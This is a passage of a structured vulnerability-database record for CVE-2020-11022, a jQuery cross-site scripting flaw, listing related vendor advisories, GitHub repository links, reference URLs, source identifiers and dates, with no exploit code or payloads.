url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20205249 - Security Advisory", }, { title: "Debian CVElist Bug Report Logs: wordpress: WordPress 5.9.2 security and maintenance release", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs&qid=e7014c0a68e8d9bc31a54125059176dc", }, { title: "Red Hat: Important: RHV Manager (ovirt-engine) [ovirt-4.5.2] bug fix and security update", trust: 0.1, url: 
"https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20226393 - Security Advisory", }, { title: "Red Hat: Moderate: ipa security, bug fix, and enhancement update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20203936 - Security Advisory", }, { title: "Red Hat: Important: RHV Manager (ovirt-engine) 4.4 security, bug fix, and enhancement update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20203247 - Security Advisory", }, { title: "Red Hat: Moderate: idm:DL1 and idm:client security, bug fix, and enhancement update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20204670 - Security Advisory", }, { title: "Red Hat: Important: Red Hat Single Sign-On 7.4.1 security update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20202813 - Security Advisory", }, { title: "Tenable Security Advisories: [R1] Nessus 8.13.0 Fixes One Third-party Vulnerability", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories&qid=TNS-2020-10", }, { title: "HP: SUPPORT COMMUNICATION- SECURITY BULLETIN\nHPSBPI03688 rev. 1 - Certain HP Printer and MFP products - Cross-Site Scripting (XSS)", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=hp_bulletin&qid=0c6e8f969487f201b1d56f59bd98f443", }, { title: "HP: SUPPORT COMMUNICATION- SECURITY BULLETIN\nHPSBPI03688 rev. 
1 - Certain HP Printer and MFP products - Cross-Site Scripting (XSS)", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=hp_bulletin&qid=e57a04f097f54c762da82263eadc1b8a", }, { title: "Red Hat: Moderate: pki-core:10.6 and pki-deps:10.6 security, bug fix, and enhancement update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20204847 - Security Advisory", }, { title: "Tenable Security Advisories: [R1] Nessus Network Monitor 5.13.0 Fixes One Third-party Vulnerability", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories&qid=TNS-2021-02", }, { title: "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.4.9 Security update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20230556 - Security Advisory", }, { title: "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.4.9 Security update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20230554 - Security Advisory", }, { title: "Tenable Security Advisories: [R1] Tenable.sc 5.17.0 Fixes Multiple Vulnerabilities", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories&qid=TNS-2020-11", }, { title: "Amazon Linux 2: ALAS2-2020-1519", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2&qid=ALAS2-2020-1519", }, { title: "Hitachi Security Advisories: Multiple Vulnerabilities in Hitachi Ops Center Common Services", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=hitachi_security_advisories&qid=hitachi-sec-2020-130", }, { title: "Tenable Security Advisories: [R1] LCE 6.0.9 Fixes Multiple Third-party Vulnerabilities", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories&qid=TNS-2021-10", }, { title: "Red Hat: Important: Red Hat Single Sign-On 7.6.2 security update", trust: 0.1, url: 
"https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20231049 - Security Advisory", }, { title: "Red Hat: Important: Red Hat Single Sign-On 7.6.2 security update on RHEL 9", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20231045 - Security Advisory", }, { title: "Red Hat: Important: Red Hat Single Sign-On 7.6.2 security update on RHEL 7", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20231043 - Security Advisory", }, { title: "Red Hat: Important: Red Hat Single Sign-On 7.6.2 security update on RHEL 8", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20231044 - Security Advisory", }, { title: "Red Hat: Important: Red Hat Single Sign-On 7.6.2 for OpenShift image security and enhancement update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20231047 - Security Advisory", }, { title: "Red Hat: Moderate: OpenShift Container Platform 4.6.1 image security update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20204298 - Security Advisory", }, { title: "Geolocation Playground", trust: 0.1, url: "https://github.com/blaufish/geo ", }, { title: "https-nj.gov---CVE-2020-11022\nRECOMMENDATION\nREFERENCES", trust: 0.1, url: "https://github.com/Snorlyd/https-nj.gov---CVE-2020-11022 ", }, { title: "https-nj.gov---CVE-2020-11022\nRECOMMENDATION\nREFERENCES", trust: 0.1, url: "https://github.com/korestreet/https-nj.gov---CVE-2020-11022 ", }, { title: "AlmostSignificant", trust: 0.1, url: "https://github.com/bartongroup/AlmostSignificant ", }, { title: "Bagel Patch Website\n\nTO DO:", trust: 0.1, url: "https://github.com/corey-schneider/bagel-shop ", }, { title: "JS_Encoder", trust: 0.1, url: "https://github.com/AssassinUKG/JS_Encoder ", }, { title: "XSSPlayground\nWhat is XSS?", trust: 0.1, url: 
"https://github.com/AssassinUKG/XSSPlayground ", }, { title: "jQuery XSS", trust: 0.1, url: "https://github.com/EmptyHeart5292/jQuery-XSS ", }, { title: "https://github.com/DanielRuf/snyk-js-jquery-565129", trust: 0.1, url: "https://github.com/DanielRuf/snyk-js-jquery-565129 ", }, { title: "CVE-2020-11022 CVE-2020-11023", trust: 0.1, url: "https://github.com/0xAJ2K/CVE-2020-11022-CVE-2020-11023 ", }, { title: "Strings_Attached\nUser Experience\nDevelopment Process\nTesting\nBugs\nLibraries and Programs Used\nDeployment\nCredits\nAcknowledgements", trust: 0.1, url: "https://github.com/johnrearden/strings_attached ", }, { title: "CVEcrystalyer", trust: 0.1, url: "https://github.com/captcha-n00b/CVEcrystalyer ", }, { title: "CVE Sandbox :: jQuery", trust: 0.1, url: "https://github.com/cve-sandbox/jquery ", }, { title: "jQuery — New Wave JavaScript", trust: 0.1, url: "https://github.com/spurreiter/jquery ", }, { title: "Github Repository Security Alerts", trust: 0.1, url: "https://github.com/elifesciences/github-repo-security-alerts ", }, { title: "Case Study", trust: 0.1, url: "https://github.com/faizhaffizudin/Case-Study-Hamsa ", }, { title: "Retire HTML Parser", trust: 0.1, url: "https://github.com/marksowell/retire-html-parser ", }, { title: "https://github.com/octane23/CASE-STUDY-1", trust: 0.1, url: "https://github.com/octane23/CASE-STUDY-1 ", }, { title: "Awesome-POC", trust: 0.1, url: "https://github.com/ArrestX/--POC ", }, { title: "Normal-POC", trust: 0.1, url: "https://github.com/Miraitowa70/POC-Notes ", }, { title: "Normal-POC", trust: 0.1, url: "https://github.com/Miraitowa70/Pentest-Notes ", }, { title: "Vulnerability", trust: 0.1, url: "https://github.com/tzwlhack/Vulnerability ", }, { title: "Awesome-POC", trust: 0.1, url: "https://github.com/KayCHENvip/vulnerability-poc ", }, { title: "Awesome-POC", trust: 0.1, url: "https://github.com/Threekiii/Awesome-POC ", }, { title: "欢迎关注阿尔法实验室微信公众号", trust: 0.1, url: 
"https://github.com/alphaSeclab/sec-daily-2020 ", }, { title: "SecBooks\nSecBooks目录", trust: 0.1, url: "https://github.com/SexyBeast233/SecBooks ", }, { title: "PoC in GitHub", trust: 0.1, url: "https://github.com/soosmile/POC ", }, ], sources: [ { db: "VULMON", id: "CVE-2020-11022", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "CWE-79", trust: 1.1, }, ], sources: [ { db: "VULHUB", id: "VHN-163559", }, { db: "NVD", id: "CVE-2020-11022", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 1.3, url: "https://www.debian.org/security/2020/dsa-4693", }, { trust: 1.2, url: "https://github.com/jquery/jquery/security/advisories/ghsa-gxr4-xjj5-5px2", }, { trust: 1.2, url: "https://security.netapp.com/advisory/ntap-20200511-0006/", }, { trust: 1.2, url: "https://www.drupal.org/sa-core-2020-002", }, { trust: 1.2, url: "https://www.tenable.com/security/tns-2020-10", }, { trust: 1.2, url: "https://www.tenable.com/security/tns-2020-11", }, { trust: 1.2, url: "https://www.tenable.com/security/tns-2021-02", }, { trust: 1.2, url: "https://www.tenable.com/security/tns-2021-10", }, { trust: 1.2, url: "https://security.gentoo.org/glsa/202007-03", }, { trust: 1.2, url: "http://packetstormsecurity.com/files/162159/jquery-1.2-cross-site-scripting.html", }, { trust: 1.2, url: "https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/", }, { trust: 1.2, url: "https://github.com/jquery/jquery/commit/1d61fd9407e6fbe82fe55cb0b938307aa0791f77", }, { trust: 1.2, url: "https://jquery.com/upgrade-guide/3.5/", }, { trust: 1.2, url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { trust: 1.2, url: 
"https://www.oracle.com/security-alerts/cpuapr2021.html", }, { trust: 1.2, url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { trust: 1.2, url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { trust: 1.2, url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { trust: 1.2, url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { trust: 1.2, url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, { trust: 1.2, url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { trust: 1.2, url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { trust: 1.2, url: "https://lists.debian.org/debian-lts-announce/2021/03/msg00033.html", }, { trust: 1.2, url: "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00067.html", }, { trust: 1.2, url: "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00085.html", }, { trust: 1.2, url: "http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00039.html", }, { trust: 1.1, url: "https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html", }, { trust: 1.1, url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/voe7p7apprqkd4fgnhbkjpdy6ffcoh3w/", }, { trust: 1.1, url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/qpn2l2xvqgua2v5hnqjwhk3apsk3vn7k/", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/rdf44341677cf7eec7e9aa96dcf3f37ed709544863d619cca8c36f133%40%3ccommits.airflow.apache.org%3e", }, { trust: 1.1, url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/sfp4uk4egp4afh2mwyj5a5z4i7xvfq6b/", }, { trust: 1.1, url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/avkyxlwclzbv2n7m46kyk4lva5oxwpby/", }, { trust: 1.1, url: 
"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/sapqvx3xdnpgft26qaq6ajixzzbz4cd4/", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/r706cfbc098420f7113968cc377247ec3d1439bce42e679c11c609e2d%40%3cissues.flink.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/rbb448222ba62c430e21e13f940be4cb5cfc373cd3bce56b48c0ffa67%40%3cdev.flink.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/r49ce4243b4738dd763caeb27fa8ad6afb426ae3e8c011ff00b8b1f48%40%3cissues.flink.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/r8f70b0f65d6bedf316ecd899371fd89e65333bc988f6326d2956735c%40%3cissues.flink.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/r564585d97bc069137e64f521e68ba490c7c9c5b342df5d73c49a0760%40%3cissues.flink.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/ree3bd8ddb23df5fa4e372d11c226830ea3650056b1059f3965b3fce2%40%3cissues.flink.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/rede9cfaa756e050a3d83045008f84a62802fc68c17f2b4eabeaae5e4%40%3cissues.flink.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/r54565a8f025c7c4f305355fdfd75b68eca442eebdb5f31c2e7d977ae%40%3cissues.flink.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/re4ae96fa5c1a2fe71ccbb7b7ac1538bd0cb677be270a2bf6e2f8d108%40%3cissues.flink.apache.org%3e", }, { trust: 1.1, url: "https://lists.apache.org/thread.html/r0483ba0072783c2e1bfea613984bfb3c86e73ba8879d780dc1cc7d36%40%3cissues.flink.apache.org%3e", }, { trust: 0.5, url: "https://access.redhat.com/security/team/contact/", }, { trust: 0.5, url: "https://nvd.nist.gov/vuln/detail/cve-2020-11022", }, { trust: 0.5, url: "https://bugzilla.redhat.com/):", }, { trust: 0.5, url: "https://access.redhat.com/security/cve/cve-2020-11022", }, { trust: 0.4, url: 
"https://nvd.nist.gov/vuln/detail/cve-2020-11023", }, { trust: 0.4, url: "https://access.redhat.com/security/cve/cve-2020-11023", }, { trust: 0.3, url: "https://access.redhat.com/security/cve/cve-2018-14042", }, { trust: 0.3, url: "https://access.redhat.com/security/cve/cve-2015-9251", }, { trust: 0.3, url: "https://access.redhat.com/security/cve/cve-2019-8331", }, { trust: 0.3, url: "https://access.redhat.com/security/cve/cve-2018-14040", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2018-14042", }, { trust: 0.3, url: "https://access.redhat.com/articles/11258", }, { trust: 0.3, url: "https://www.redhat.com/mailman/listinfo/rhsa-announce", }, { trust: 0.3, url: "https://access.redhat.com/security/cve/cve-2019-11358", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2016-10735", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2019-11358", }, { trust: 0.3, url: "https://access.redhat.com/security/updates/classification/#moderate", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2015-9251", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2018-14040", }, { trust: 0.3, url: "https://access.redhat.com/security/team/key/", }, { trust: 0.3, url: "https://access.redhat.com/security/cve/cve-2016-10735", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2019-8331", }, { trust: 0.2, url: "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.3_release_notes/", }, { trust: 0.2, url: "https://access.redhat.com/security/updates/classification/#important", }, { trust: 0.2, url: "https://listman.redhat.com/mailman/listinfo/rhsa-announce", }, { trust: 0.2, url: "https://docs.ansible.com/ansible-tower/latest/html/upgrade-migration-guide/", }, { trust: 0.1, url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/avkyxlwclzbv2n7m46kyk4lva5oxwpby/", }, { trust: 0.1, url: 
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/voe7p7apprqkd4fgnhbkjpdy6ffcoh3w/", }, { trust: 0.1, url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/qpn2l2xvqgua2v5hnqjwhk3apsk3vn7k/", }, { trust: 0.1, url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/sfp4uk4egp4afh2mwyj5a5z4i7xvfq6b/", }, { trust: 0.1, url: "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/sapqvx3xdnpgft26qaq6ajixzzbz4cd4/", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/rdf44341677cf7eec7e9aa96dcf3f37ed709544863d619cca8c36f133@%3ccommits.airflow.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/rbb448222ba62c430e21e13f940be4cb5cfc373cd3bce56b48c0ffa67@%3cdev.flink.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r706cfbc098420f7113968cc377247ec3d1439bce42e679c11c609e2d@%3cissues.flink.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r49ce4243b4738dd763caeb27fa8ad6afb426ae3e8c011ff00b8b1f48@%3cissues.flink.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r564585d97bc069137e64f521e68ba490c7c9c5b342df5d73c49a0760@%3cissues.flink.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r8f70b0f65d6bedf316ecd899371fd89e65333bc988f6326d2956735c@%3cissues.flink.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/rede9cfaa756e050a3d83045008f84a62802fc68c17f2b4eabeaae5e4@%3cissues.flink.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/ree3bd8ddb23df5fa4e372d11c226830ea3650056b1059f3965b3fce2@%3cissues.flink.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r54565a8f025c7c4f305355fdfd75b68eca442eebdb5f31c2e7d977ae@%3cissues.flink.apache.org%3e", }, { trust: 0.1, url: 
"https://lists.apache.org/thread.html/re4ae96fa5c1a2fe71ccbb7b7ac1538bd0cb677be270a2bf6e2f8d108@%3cissues.flink.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r0483ba0072783c2e1bfea613984bfb3c86e73ba8879d780dc1cc7d36@%3cissues.flink.apache.org%3e", }, { trust: 0.1, url: "https://cwe.mitre.org/data/definitions/79.html", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2020:2217", }, { trust: 0.1, url: "https://nvd.nist.gov", }, { trust: 0.1, url: "https://github.com/blaufish/geo", }, { trust: 0.1, url: "https://www.cisa.gov/uscert/ics/advisories/icsa-22-055-02", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-1721", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-10146", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-10221", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-1721", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-15720", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-15720", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-10146", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-10179", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-10179", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-10221", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2020:4847", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2022-40150", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2022-3143", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2023:0553", }, { trust: 0.1, url: "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2022-42003", }, { trust: 0.1, url: 
"https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2022-42004", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-14041", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2022-40150", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2022-45047", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2017-18214", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2022-40152", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2022-40149", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2022-40149", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2022-40152", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-14041", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2017-18214", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2022-45693", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2022-46364", }, { trust: 0.1, url: "https://issues.jboss.org/):", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2022-3143", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-12723", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-17006", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-20907", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-12749", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-12401", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-12402", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-1971", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-14866", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-20372", }, { trust: 0.1, url: 
"https://access.redhat.com/security/cve/cve-2020-10878", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2021-20228", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-7595", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-20843", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2021-20253", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-17006", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-11719", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-20388", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-12401", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-17023", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-17023", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-12749", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-6829", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2021:0778", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-14866", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-8177", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-12403", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-12400", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-20388", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-12723", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-19956", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-11756", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-11756", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-12243", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-10543", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-12400", }, { trust: 0.1, url: 
"https://access.redhat.com/security/cve/cve-2021-20191", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-11727", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-12243", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-1971", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-11719", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2021-20180", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-11727", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2016-5766", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-12403", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-15903", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-10878", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2021-20178", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2016-5766", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-15903", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-20372", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-19956", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-17498", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-17498", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-20907", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-10543", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-35678", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-20843", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-12402", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-1722", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-20676", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-1722", }, { trust: 0.1, url: 
"https://nvd.nist.gov/vuln/detail/cve-2018-20676", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-20677", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2020:4670", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-20677", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2020:5249", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-7676", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-7743", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-18874", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-7720", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-7676", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-7720", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-7743", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-18874", }, ], sources: [ { db: "VULHUB", id: "VHN-163559", }, { db: "VULMON", id: "CVE-2020-11022", }, { db: "PACKETSTORM", id: "159852", }, { db: "PACKETSTORM", id: "170823", }, { db: "PACKETSTORM", id: "161727", }, { db: "PACKETSTORM", id: "159876", }, { db: "PACKETSTORM", id: "160274", }, { db: "NVD", id: "CVE-2020-11022", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULHUB", id: "VHN-163559", }, { db: "VULMON", id: "CVE-2020-11022", }, { db: "PACKETSTORM", id: "159852", }, { db: "PACKETSTORM", id: "170823", }, { db: "PACKETSTORM", id: "161727", }, { db: "PACKETSTORM", id: "159876", }, { db: "PACKETSTORM", id: "160274", }, { db: "NVD", id: "CVE-2020-11022", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2020-04-29T00:00:00", db: "VULHUB", id: "VHN-163559", }, { date: "2020-04-29T00:00:00", db: "VULMON", id: "CVE-2020-11022", }, { 
date: "2020-11-04T15:29:15", db: "PACKETSTORM", id: "159852", }, { date: "2023-01-31T17:26:38", db: "PACKETSTORM", id: "170823", }, { date: "2021-03-09T16:25:11", db: "PACKETSTORM", id: "161727", }, { date: "2020-11-04T15:32:52", db: "PACKETSTORM", id: "159876", }, { date: "2020-11-30T15:51:22", db: "PACKETSTORM", id: "160274", }, { date: "2020-04-29T22:15:11.903000", db: "NVD", id: "CVE-2020-11022", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2022-07-25T00:00:00", db: "VULHUB", id: "VHN-163559", }, { date: "2023-11-07T00:00:00", db: "VULMON", id: "CVE-2020-11022", }, { date: "2024-11-21T04:56:36.110000", db: "NVD", id: "CVE-2020-11022", }, ], }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Red Hat Security Advisory 2020-4847-01", sources: [ { db: "PACKETSTORM", id: "159852", }, ], trust: 0.1, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "code execution, xss", sources: [ { db: "PACKETSTORM", id: "170823", }, { db: "PACKETSTORM", id: "161727", }, { db: "PACKETSTORM", 